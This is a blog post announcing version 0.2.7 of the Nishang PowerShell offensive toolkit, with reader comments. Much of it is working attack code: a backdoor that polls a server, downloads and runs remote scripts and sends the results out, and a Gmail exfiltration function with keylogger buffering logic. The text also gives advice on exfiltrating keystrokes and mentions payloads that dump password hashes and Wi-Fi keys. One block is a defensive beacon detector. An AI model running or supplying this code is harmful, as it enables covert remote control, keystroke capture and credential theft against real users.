Monday, June 10, 2013

Nishang 0.2.7 - Improved backdoors, keylogger and better exfiltration

I like the backdoors in Nishang. Though very basic, they can be very useful depending on the situation and on the permission you have for using them (during a pen test). Two major things have been improved in Nishang 0.2.7 for the backdoors (DNS_TXT_Pwnage, Time_Execution and Wait_For_Command):

1. They can now be stopped remotely, and they no longer exit automatically after a single run.

Remote stopping uses simple logic. The payload takes a URL (or a DNS TXT record, in the case of DNS_TXT_Pwnage) where it looks for a particular string. As soon as that string is found there, the backdoor stops itself. The code snippet of Wait_For_Command below shows this:

What do we see here? The backdoor connects to $CheckURL every 5 seconds and compares the content with $MagicString (lol!). When they match, a script is downloaded and executed. We will look at exfiltration in a moment. After that, the variable $exec (the result of the execution) is checked; on success the payload waits for a minute before doing anything else. This delay is there to avoid generating too much traffic.
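The loop described above, written out as an added example (this is not Nishang's own Wait_For_Command code): a remote stop string, a magic string that triggers download-and-execute, and the post-success delay. The $Fetch and $Exfil parameters default to a live WebClient and console output but accept stubs, which is how the demo at the end runs offline; every URL, string and function name here is an assumption for illustration.

```powershell
# Added example, not Nishang's code. Names, URLs and strings are placeholders.
function Invoke-PollingBackdoor {
    param(
        [Parameter(Mandatory = $true)] [string] $CheckURL,      # content compared with $MagicString
        [Parameter(Mandatory = $true)] [string] $MagicString,
        [Parameter(Mandatory = $true)] [string] $PayloadURL,    # script to download and run
        [Parameter(Mandatory = $true)] [string] $StopURL,       # content compared with $StopString
        [Parameter(Mandatory = $true)] [string] $StopString,
        [int] $PollSeconds = 5,                                 # fixed interval, as in 0.2.7
        [int] $SuccessDelaySeconds = 60,                        # back off after a successful run
        [int] $JitterSeconds = 0,                               # >0 adds a random 0..N s to each sleep
        [scriptblock] $Fetch = { param($Url) (New-Object System.Net.WebClient).DownloadString($Url) },
        [scriptblock] $Exfil = { param($Data) Write-Host $Data }
    )
    $runs = 0
    while ($true) {
        # 1. Kill switch first: if the stop string is being served, exit immediately.
        $stop = & $Fetch $StopURL
        if ($stop -and $stop.Trim() -eq $StopString) { break }

        # 2. Tasking: act only when the check URL carries the magic string.
        $delay = $PollSeconds
        $check = & $Fetch $CheckURL
        if ($check -and $check.Trim() -eq $MagicString) {
            $code = & $Fetch $PayloadURL
            try {
                # Whatever the downloaded script returns is what gets exfiltrated,
                # so the payload must return its result rather than only display it.
                $exec = Invoke-Expression $code | Out-String
            } catch {
                $exec = "Execution failed: $($_.Exception.Message)"
            }
            if ($exec) {
                & $Exfil $exec
                $runs++
                $delay = $SuccessDelaySeconds   # do not re-run and re-post on the very next poll
            }
        }
        if ($JitterSeconds -gt 0) { $delay += Get-Random -Minimum 0 -Maximum ($JitterSeconds + 1) }
        Start-Sleep -Seconds $delay
    }
    return $runs
}

# Offline demo: a hashtable stands in for the web server and a List collects what
# would have been exfiltrated. The stub exfil flips the stop string, so the loop
# runs the payload once and then honours the kill switch on the next poll.
$server = @{
    'http://c2.example.invalid/check'   = 'magic'
    'http://c2.example.invalid/payload' = '"payload ran on " + $env:COMPUTERNAME'
    'http://c2.example.invalid/stop'    = 'keep going'
}
$sent = New-Object System.Collections.Generic.List[string]
$stubFetch = { param($Url) $server[$Url] }
$stubExfil = { param($Data) $sent.Add($Data); $server['http://c2.example.invalid/stop'] = 'stop' }

$runs = Invoke-PollingBackdoor -CheckURL 'http://c2.example.invalid/check' -MagicString 'magic' `
    -PayloadURL 'http://c2.example.invalid/payload' -StopURL 'http://c2.example.invalid/stop' `
    -StopString 'stop' -PollSeconds 0 -SuccessDelaySeconds 0 -Fetch $stubFetch -Exfil $stubExfil
"Payload runs before the stop string was honoured: $runs"
"Exfiltrated: $($sent -join '')"
```

The stop check runs before the tasking check on every iteration, so an operator can always pull the backdoor out even while the check URL still carries the magic string; $JitterSeconds is left at 0 to match the fixed 5-second behaviour of this release.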

Still, since the backdoor connects to a URL every 5 seconds, it could be picked up fairly easily by anyone monitoring egress traffic. Things are under constant improvement, and in a future release the backdoors may connect at irregular intervals.
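The defender's side of that caveat, as an added example that is not part of Nishang or of the original post: proxy log lines (constructed here, in an assumed "time src method url" format) are grouped by source and URL, and any group whose gaps between requests are nearly identical is reported. In the sample, 10.0.0.5 polls one URL every 5 seconds; 10.0.0.7 fetches a feed at irregular times and is not reported.

```powershell
# Added example, not part of Nishang. Log format and sample lines are constructed.
$proxyLog = @'
2013-06-10T10:00:00 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:05 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:10 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:15 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:20 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:25 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:30 10.0.0.5 GET http://c2.example.invalid/check
2013-06-10T10:00:00 10.0.0.7 GET http://news.example.invalid/feed
2013-06-10T10:00:03 10.0.0.7 GET http://news.example.invalid/feed
2013-06-10T10:00:41 10.0.0.7 GET http://news.example.invalid/feed
2013-06-10T10:01:10 10.0.0.7 GET http://news.example.invalid/feed
2013-06-10T10:01:12 10.0.0.7 GET http://news.example.invalid/feed
2013-06-10T10:02:55 10.0.0.7 GET http://news.example.invalid/feed
'@

function Find-FixedIntervalBeacons {
    param(
        [Parameter(Mandatory = $true)] [string[]] $Lines,
        [int] $MinRequests = 6,        # fewer than this and the gaps tell you little
        [double] $MaxVariation = 0.1   # stddev/mean of the gaps; 0 = perfectly regular
    )
    $events = foreach ($line in $Lines) {
        $f = $line -split ' ', 4
        if ($f.Count -ne 4) { continue }
        [pscustomobject]@{
            Time = [datetime]::ParseExact($f[0], 'yyyy-MM-ddTHH:mm:ss', [cultureinfo]::InvariantCulture)
            Src  = $f[1]
            Url  = $f[3]
        }
    }
    foreach ($g in ($events | Group-Object Src, Url)) {
        if ($g.Count -lt $MinRequests) { continue }
        $times = @($g.Group | Sort-Object Time | ForEach-Object { $_.Time })
        $gaps  = @(for ($i = 1; $i -lt $times.Count; $i++) { ($times[$i] - $times[$i - 1]).TotalSeconds })
        $mean  = ($gaps | Measure-Object -Average).Average
        $var   = ($gaps | ForEach-Object { ($_ - $mean) * ($_ - $mean) } | Measure-Object -Average).Average
        $cv    = if ($mean -gt 0) { [math]::Sqrt($var) / $mean } else { 0 }
        if ($cv -le $MaxVariation) {
            [pscustomobject]@{
                Src            = $g.Group[0].Src
                Url            = $g.Group[0].Url
                Requests       = $g.Count
                MeanGapSeconds = [math]::Round($mean, 1)
                GapVariation   = [math]::Round($cv, 3)
            }
        }
    }
}

Find-FixedIntervalBeacons -Lines ($proxyLog -split "`r?`n") | Format-Table -AutoSize
```

A fixed sleep produces a gap variation of essentially zero, which is what makes this release's backdoors easy to spot; randomising the interval raises the variation and pushes the group past the threshold, which is exactly why jittered intervals matter to both sides.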

2. Exfiltration methods have been added and improved. The payloads can now send data to pastebin, Gmail or tinypaste, and the backdoors can return the result of command or script execution using one of these methods. A new function, Do-Exfiltration, has been added to the payloads that need to communicate with the Internet.

Let's see Wait_For_Command in action with exfiltration enabled.

When running it from a non-interactive* shell, use it like this:

*Non-interactive in PowerShell terms. For example, because of how standard output is handled, an interactive PowerShell session is not possible from a Meterpreter or native shell in msf.

We used Get-WLAN-Keys from a non-elevated shell, so the result is:


Nice! Make sure the payload that gets downloaded returns its result, because that returned value is what gets exfiltrated.

The biggest impact of this is on the keylogger, which sends a lot of data, while pastebin allows only a limited number of pastes per day for a free account. Gmail is recommended for the keylogger. If the Gmail account used for exfiltration has two-factor authentication enabled, an application-specific password can be used. There has been another small but significant improvement in the keylogger: it now sends the complete key buffer for the first 30 exfiltration rounds and only the new keys after that. This reduces the size of the data sent and removes redundant keys.
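The two pieces above, exfiltration through Gmail with an app-specific password and the keylogger's "full buffer 30 times, then only new keys" rule, as an added example that is not Nishang's Do-Exfiltration or keylogger code. The Gmail address, app password and recipient are placeholders, the function names are assumptions, and the demo at the end lowers the threshold to 2 rounds so the switch to delta mode is visible without 30 rounds.

```powershell
# Added example, not Nishang's code. Credentials and addresses are placeholders.
function Send-GmailExfil {
    param(
        [Parameter(Mandatory = $true)] [string] $Username,     # full Gmail address
        [Parameter(Mandatory = $true)] [string] $AppPassword,  # 16-character app-specific password
        [Parameter(Mandatory = $true)] [string] $To,
        [Parameter(Mandatory = $true)] [string] $Subject,
        [Parameter(Mandatory = $true)] [string] $Body
    )
    $smtp = New-Object System.Net.Mail.SmtpClient('smtp.gmail.com', 587)
    $smtp.EnableSsl   = $true   # STARTTLS on 587, so the credentials do not cross the wire in clear
    $smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $AppPassword)
    $smtp.Send($Username, $To, $Subject, $Body)
}

# Captured keys accumulate in one buffer. For the first $FullSends rounds the whole
# buffer is sent; after that only the keys appended since the previous round go out.
$KeyState = @{ Buffer = ''; Rounds = 0; SentUpTo = 0 }

function Add-CapturedKeys {
    param([Parameter(Mandatory = $true)] [string] $Keys)
    $KeyState.Buffer += $Keys
}

function Get-KeysToSend {
    param([int] $FullSends = 30)
    if ($KeyState.Rounds -lt $FullSends) {
        $chunk = $KeyState.Buffer
    } else {
        $chunk = $KeyState.Buffer.Substring($KeyState.SentUpTo)
    }
    $KeyState.SentUpTo = $KeyState.Buffer.Length
    $KeyState.Rounds++
    return $chunk
}

# Demo with the threshold lowered to 2 rounds: the first two rounds send the whole
# buffer, the third sends only what was captured after round two.
Add-CapturedKeys 'abc'
"Round 1 sends: " + (Get-KeysToSend -FullSends 2)
Add-CapturedKeys 'def'
"Round 2 sends: " + (Get-KeysToSend -FullSends 2)
Add-CapturedKeys 'ghi'
"Round 3 sends: " + (Get-KeysToSend -FullSends 2)

# A real round, kept commented so the example runs offline:
# $chunk = Get-KeysToSend
# if ($chunk) { Send-GmailExfil -Username 'you@gmail.com' -AppPassword 'xxxx xxxx xxxx xxxx' `
#     -To 'you@gmail.com' -Subject "keys from $env:COMPUTERNAME" -Body $chunk }
```

Gmail only issues app-specific passwords once 2-step verification is on for the account, and a round that sends an empty delta is skipped rather than generating a mail with no content.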

Persistence has been tested for most of the payloads and will be part of a near-future release.

Below is the full CHANGELOG for this version:

- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, they no longer stop automatically after running a script/command.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltrating the keys 30 times.
- A delay after success has been introduced in the various payloads that connect to the Internet, to avoid generating too much traffic.

You can get Nishang from its repository here. New users, please check it out; existing users, please update your repos.

I expect feedback, comments, bug reports and feature requests. I hope this will be useful.


  1. I have a problem in execution; my account contains "&" in the password; it shows that & is reserved for future use, and script execution stopped.

  2. Need more details. Which payload are you trying to execute? Which password contains a "&"? If it is for pastebin/gmail etc., have you tried with an account whose password does not contain "&"?

  3. I tried the information-gather & get-passhash payloads; they give me the following error. I tried gmail & pastebin.

    Ampersand not allowed. The & operator is reserved for future use; use "&" to pass ampersand as a string.
    At line:1 char:73
    + .\Get-PassHashes.ps1 da6ecb1a05bca6be53541a758134b1e1 here_is_my_usernameof_pastebin NQADq& <<<< 5dj
    + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : AmpersandNotAllowed

    And yes, the payload works fine when the password doesn't contain &.

    1. Ok, the error you are getting is because PowerShell is interpreting the "&" in your password as a special character. I cannot address this issue immediately but will have a look at it in a future release. Would you mind raising an issue here? That would help me in keeping track of this. Thanks.

  4. Thank you sir; I will raise the issue there. And in feature requests you should add a new module like mimikatz, which can get clear-text passwords. I know with the help of get-passhash we can get NTLM hashes, but it's easier if we get clear text.
